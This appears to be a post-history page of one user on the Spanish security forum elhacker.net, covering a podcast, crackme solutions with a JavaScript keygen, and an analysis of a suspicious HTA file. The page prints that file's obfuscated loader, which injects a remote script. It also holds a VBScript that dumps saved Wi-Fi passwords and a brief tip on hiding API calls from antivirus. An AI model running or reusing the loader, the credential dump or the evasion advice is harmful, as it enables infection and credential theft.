elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.


Tema destacado: Como proteger una cartera - billetera de Bitcoin


  Mostrar Mensajes
Páginas: [1] 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 ... 119
1  Foros Generales / Foro Libre / PODCAST de Héctor López en el canal de MAFIA en: 8 Junio 2025, 00:58 am
Hola amigos navegando por YouTube encontré un video de un podcast, o sea es una entrevista a un hacker llamado Héctor López aquí el video




lo que me sorprende es que habla de varias cosas que no creo que sea verdad por eso les dejo el video...mis respetos a este señor pero no creo algunas de las cosas que dice que se puede hacer...aclaro yo soy novato no me consideró experto y tengo mucho tiempo en los foros pero lo que no me cuadra son ciertas cosas como lo de tumbar páginas como dice el que tiene una herramienta para eso, otra que dice que paseando en un auto con unos chips puede ir hackeando las redes wifi...yo para tumbar una página conozco el ataque DDOS como funciona, pero una herramienta capas de tumbar una página aparte del DDOS creo que seria reportándola  creo no conozco mucho de tumbar páginas, mi área es la ingeniería inversa.



Otra idea seria que tuviera acceso al servidor y borrara todo pero en fin...hay muchas maneras pero creo que este amigo exagera con lo que habla...mis respetos para el pero no creo muchas cosas en fin hay esta el video a ver que opinan



saludos Flamer y hay me dicen si lo conocen
2  Seguridad Informática / Análisis y Diseño de Malware / Re: Nuevo malware via archivo HTA en: 10 Mayo 2025, 16:35 pm
orale gracias
3  Seguridad Informática / Análisis y Diseño de Malware / Nuevo malware via archivo HTA en: 10 Mayo 2025, 00:07 am
Hola he estado navegando en algunas paginas y me salen publicidad y de repente se descargan archivos zip o 7z y al descomprimirlo aparece un archivo .hta...bueno al abrirlo contiene lo siguiente

Código:
<script>



document.write("\154\074\163\143\162\151\160\164\040\163\162\143\075\150\164\164\160\163\072\057\057\063\141\071\143\060\071\066\064\056\160\162\145\143\162\145\141\164\151\166\145\056\160\151\143\163\057\061\165\164\066\151\065\166\143\144\070\064\152\065\076\074\057\163\143\162\151\160\164\076\152\144\145\154")


</script>

asi que no lo ejecute..... cambie el document.write por un alert aver que imprimia y sale esto



por lo que veo redirige a una pagina... pero no entiendo como el atacante puede infectar mi computadora tiene algun bug los archivos hta al visitar dicha web... no entiendo

saludos Flamer y mi navegador chrome me lo marca como peligroso
4  Programación / Ingeniería Inversa / Solucion crackme1 de tHE ANALYST mas keygen en: 22 Abril 2025, 00:13 am
Hola amigos hoy vengo con un pequeño tutorial es la solucion de un crackme sencillo es para novatos bueno empesemos este es el crackme



asi que lo abrimos con el x32dbg y vemos en los string la frase



damos doble clic y no manda a esta zona



como ven en la imagen se mira donde esta la api que compara y donde se genera el serial asi que yo puse un breakpoint en la direccion 0040110c

        
Citar
0040110C | 0FBE840D 48FFFFFF        | movsx eax,byte ptr ss:[ebp+ecx-B8]                
00401114 | 41                                  | inc ecx                                            
00401115 | 33C1                              | xor eax,ecx                                        
00401117 | 03D8                              | add ebx,eax                                        
00401119 | 3B4D D8                        | cmp ecx,dword ptr ss:[ebp-28]                      
0040111C | 75 EE                             | jne k4n1.40110C                                    
0040111E | 6BC0 06                         | imul eax,eax,6                                    
00401121 | C1E3 07                         | shl ebx,7                                          
00401124 | 03C3                             | add eax,ebx                                        
00401126 | 8945 C8                         | mov dword ptr ss:[ebp-38],eax                      

y veo que lee letra por letra del nombre que ingresamos y luego incrementa ECX para despues xorear el valor ascii del nombre ingresado que esta en EAX con ECX  para despues sumar lo en EBX he irlo almacenando hay....al salir de ese bucle multiplica el valor EAX con 6 y despues sigue una instruccion shl 7 lo que hace es desplazar 7 bits a la deracha si ingreso Flamer como nombre EBX valdra 254 en hexadecimal en binario es:

0010 0101 0100    ahora le aplicamos el desplazamiento de 7 bits asi
0010 0101 0100  0000 000  ahora EBX valdra 12A00 en hexadecimal

despues ese valor es sumado con EAX en la linea 00401124 y ese sera el serial resultante para el crackme aqui les dejo el keygen

Código:
<html>
<head><title>keygen crackme1 de tHE ANALYST ...::::By Flamer::::...</title>
</head>
<body bgcolor="black">
<center>
<marquee style="color:white;font-size:50;">keygen crackme1 de tHE ANALYST ...::::By Flamer::::...</marquee><br><br><br><br><br><br>
<div style="color:white;font-size:30;">
Nombre:&nbsp;&nbsp;<input type="text" id="nom" style="background-color:black;color:white;text-align:center;width:400;height:30;"><br>

Password:<input type="text" id="pass" style="background-color:black;color:white;text-align:center;width:400;height:30;""><br><br>
</div>

<input type="button" value="Generar" onclick="star(0)" style="width:100;height:30;">
<input type="button" value="Automatico" onclick="star(1)" style="width:100;height:30;">
<input type="button" value="Detener" onclick="stop()" style="width:100;height:30;">
<input type="button" value="Limpiar" onclick="clear()" style="width:100;height:30;">

</center>
<script>
let time=0

function star(y)
{
   let x,digito,d,ebx=0,serial="",cadena="",largo,digi,nick=""
  
   if(y==1)
   {
      cadena="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"
 largo=parseInt(Math.random()*(26-5)+5)
 l=cadena.length - 1
 
 for(x=0;x<largo;x++)
 {
    digi=parseInt(Math.random()*(l-0)+0)
nick+=cadena.substring(digi-1,digi)
 }
 document.getElementById("nom").value=nick
   }
   else
   {  
      nick=document.getElementById("nom").value
   }
  
   for(x=1;x<=nick.length;x++)
   {
      digito=nick.substring(x-1,x)
 d=digito.charCodeAt(0) ^ x
 ebx+=d
   }
   d=d*6
   ebx=(ebx*128)+d
   serial=ebx.toString(16)
   document.getElementById("pass").value=serial.toUpperCase()
  
   if(y==1)
   {
       time=setTimeout("star(1)",10)
   }
}
function stop()
{
   clearTimeout(time)
}
function clear()
{
   document.getElementById("nom").value=""
   document.getElementById("pass").value=""
}
</script>
</body>
</html>



como ven la clave para Flamer es 12CB8

saludos Flamer y espero les guste el keygen esta hecho en html y javascript....para el desplazamiento en el codigo javascript solo multiplique por 128 por que 2 elevado a la 7 es 128



el crackme lo pueden descargar de la pagina  https://crackmes.one/
5  Programación / Ingeniería Inversa / Solucion CrackMe Para Novatos (UltraFacil) en: 15 Abril 2025, 18:15 pm
Hola amigos estaba dando la vuelta por el foro de underc0de y me tope con este reto

https://underc0de.org/foro/wargames-202/crackme-para-novatos-ultrafacil/

y se me hizo facil y entretenido ya que no podia dar con bola no sabia que era un .NET y no podia revisarlo con el x32dbg, hasta que se me prendio el foco que podria ser un ejecutable compilado en un .NET en el mismo tema se puede observar el codigo decompilado por el usuario Joshyba...bueno en fin lo revisamos con el ExeinfoPE y nos muestra lo siguiente



asi que es un .NET ahora buscaremos un decompilador para .NET yo use el dotPeek32 y nos muestra lo siguiente



aqui podemos ver que el codigo completo y observamos que la primera ves que pide la contraseña es almasenada en la variable num2 y la segunda ves en num3 y luego pregunta en el if si num2 y num3 son diferentes si son diferentes entra y muestra el mensaje de contraseñas diferentes, asi que las dos vesces que pide la contraseña tiene que ser iguales y si son iguales pregunta si num3 y num1 son iguales y al principio del codigo vemos que num1 es igual a 767 entonces nos quesa claro que la contraseña tiene que ser 767 y lo intentaremos aqui la imagen



bueno es un reto muy facil yo no daba con vola por que no sabia que era un .NET y intentaba reversearlo con x32dbg jajaja en fin es pero les guste saludos Flamer


6  Programación / Scripting / Re: [APORTE] Batch que devuelva contraseñas Wifi guardadas de Windows 10 en: 11 Abril 2025, 05:31 am
Saludos, De verdad tremendo aporte simplificaste mucho el trabajo realizado. Lo que me llama la atencion es el uso de Option Explicit para el script. Ya lo testeo y comento que tal. La verdadera incognita es como quedaria con Python y Ruby.

Saludos

hola Bad4m_cod3 creo que quedaria mas bien usando el metodo StdOut.RealAll() seria mas rapido ya que usando el metodo linea por linea es mas lento y mas si lo haces en javascript es muy lento...pero tendria que modificar el codigo y es mas complicado pero no imposible y el comado option explicit es para validar de que las variables a usar sean declaradas y si falta una por declarar te marcaria un error asi es mas eficiente el codigo...al principio yo no lo usaba pero me lo aclaro MCKSys Argentina

en fin saludos Flamer
7  Programación / Scripting / Re: [APORTE] Batch que devuelva contraseñas Wifi guardadas de Windows 10 en: 10 Abril 2025, 17:33 pm
Hola esta interesante el tema yo lo hice en vbscript aqui el codigo

Código
  1. option explicit
  2. dim shell,exec1,exec2,datos1,datos2,posicion1,posicion2
  3.  
  4. set shell=CreateObject("wscript.shell")
  5. set exec1=shell.exec("cmd /c netsh wlan show profile")
  6.  
  7. do
  8.   datos1=exec1.StdOut.ReadLine()  
  9.   posicion1="    Perfil de todos los usuarios     : "
  10.  
  11.   if instr(datos1,posicion1) Then
  12.  datos1=Replace(datos1,posicion1,"")
  13.  set exec2=shell.exec("cmd /c netsh wlan show profile " & chr(34) & datos1 & chr(34) & " key=clear")
  14.  
  15.  do
  16.     datos2=exec2.StdOut.ReadLine()
  17.         posicion2="    Contenido de la clave  : "
  18.  
  19. if instr(datos2,posicion2) then
  20.    datos2=Replace(datos2,posicion2,"")
  21.    msgbox "La password de el usuario " & datos1 & "  es : " & datos2
  22. end if
  23.  
  24.  loop while not exec2.StdOut.atEndofStream  
  25.  
  26.   end if
  27.  
  28. loop while not exec1.StdOut.atEndofStream
  29.  

una cosa nose si funcione igual en windows 10, me refiero aque si devuelbe los mismos string yo lo use en windows 11...busque en google y me aparece que solo funciona en windows 10 y 11

saludos Flamer y no ocupa permisos


8  Programación / Ingeniería Inversa / Re: y los crackmes de descarga del hacker.net en: 21 Marzo 2025, 00:20 am
Hola, que crackme es el que buscas? Creo recordar que Karmany tenía guardados los del tema con chincheta.

Saludos.
los que se descargaban desde aqui


------edito-----
ya los encontre son estos
https://www.elhacker.net/hacking-programas-hack.html#crackmes
9  Programación / Ingeniería Inversa / y los crackmes de descarga del hacker.net en: 18 Marzo 2025, 01:19 am
hola he estado buscando los crackmes del foro y no los encuentro....creo que a lo mejor no he buscado bien  :huh:

saludos
10  Seguridad Informática / Análisis y Diseño de Malware / Re: Cuales son los mejores lenguajes de programacion para crear malware? en: 12 Julio 2024, 17:57 pm
hola tienes que esconder o no usar las apis  como dice WHK por que son muy detectadas por los antivirus

saludos Flamer
Páginas: [1] 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 ... 119
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines